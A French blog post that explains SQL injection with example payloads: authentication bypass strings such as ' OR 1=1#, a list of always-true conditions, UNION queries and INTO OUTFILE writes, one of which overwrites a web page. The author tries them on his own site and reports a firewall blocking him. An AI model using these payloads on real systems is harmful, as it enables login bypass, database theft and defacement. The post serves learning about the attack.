0

Injection SQL. J’ai voulu injecter piregwan-genesis.com comme un hacker 😈 mais ça n’a pas fonctionnĂ© !

L’injection SQL est une mĂ©thode d’attaque trĂšs connue. C’est un vecteur d’attaque extrĂȘmement puissant quand il est bien exploitĂ©. Cette faille apparaĂźt quand il est possible d’injecter du code SQL dans les requĂȘtes SQL qui sont faites pour une page web. C’est actuellement la meilleure vulnĂ©rabilitĂ© Web en rapport frĂ©quence/surface d’exploitation.

Les consĂ©quences d’une faille SQL peuvent ĂȘtre multiples, du contournement de formulaires d’authentification au dump complet de la base de donnĂ©es en passant par l’exĂ©cution arbitraire de code.

Beaucoup d’exemples d’injection en français et les solutions pour les sĂ©curiser.

Exemple sur une requĂȘte simple

SELECT * from utilisateurs WHERE login='$login' AND password='$password'

Si le pseudo saisi est ‘ OR 1=1#, la requĂȘte devient :

SELECT * from utilisateurs WHERE login='' OR 1=1#' AND password='$password'

Equivalente Ă  :

SELECT * from utilisateurs WHERE login='' OR 1=1

Les injections de conditions toujours vraies comme 1=1

SELECT * FROM admin WHERE login='' OR '1'='1' AND pass='' OR '1'='1'

Voici une liste non-exhaustive d’instructions toujours vraies qui peuvent ĂȘtre utilisĂ©es

'='
'OR 1=1
'OR a=a
'OR'
'OR''='
'OR"="
'OR'="
'OR '="
'OR "='
'OR ''='
'OR '=''
'OR "=''
'OR ''="

Les liaisons entre les tables avec UNION

SELECT login, password FROM admin WHERE login='' UNION SELECT login, password from admin # ' and password='$password'

Redirection vers un fichier de sortie et manipulation de fichiers avec SQL !

SQL n’a pas fini de nous Ă©tonner : il est mĂȘme possible d’y manipuler des fichiers ! En effet, lorsque le privilĂšge FILES sous MySQL est accordĂ© Ă  l’utilisateur, il est possible d’utiliser les droits en lecture et en Ă©criture accordĂ©s Ă  l’utilisateur mysql du systĂšme.

SELECT login, password FROM admin WHERE login='' OR 'X'='X' INTO OUTFILE '../../www/file.txt' #' AND password='$password'";

SELECT boumboum FROM blabla WHERE badparam=-1 UNION SELECT 'Hacked !' INTO OUTFILE '/var/www/target/index.php' ;

Injections SQL avancées

https://www.bases-hacking.org/injections-sql-avancees.html

Lorsque j’ai voulu injecter piregwan-genesis.com est apparue la Firebox de WatchGuard 🙂

Je ne sais pas d’oĂč sort cette protection de la mort de derniĂšre minute WatchGuard Technologies (mon hĂ©bergeur ?) mais la tentative d’injection a Ă©tĂ© stoppĂ©e net et je suis trĂšs content, persuadĂ© que piregwan-genesis n’est pas Ă  l’abri d’injections.

Le service IPS de WatchGuard Technologies (Intrusion Prevention Service) protĂšge votre rĂ©seau contre une large gamme d’activitĂ©s malveillantes, y compris les injections SQL, les attaques de script intersites et les attaques par dĂ©passement de mĂ©moire tampon.

Vous pouvez Ă©valuer cet article en un clic. Garanti sans gluten. Merci !
(Evaluations : 0 / Moyenne : 0)

Piregwan

MaĂźtre des traditions et Grand malade Ă  World of Warcraft (18.000 heures de jeu), chasseur de gardiens Ă  Ingress (RES) pendant 5 ans, amateur de piments đŸŒ¶ïž au delĂ  de 30.000 Scoville et de pizza maison 🍕, j'aime les 3C (les chats đŸ˜Œ, le code et les choux de Bruxelles đŸ„Š) et la philosophie du CCC allemand (Chaos Computer Club đŸ’»).

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée.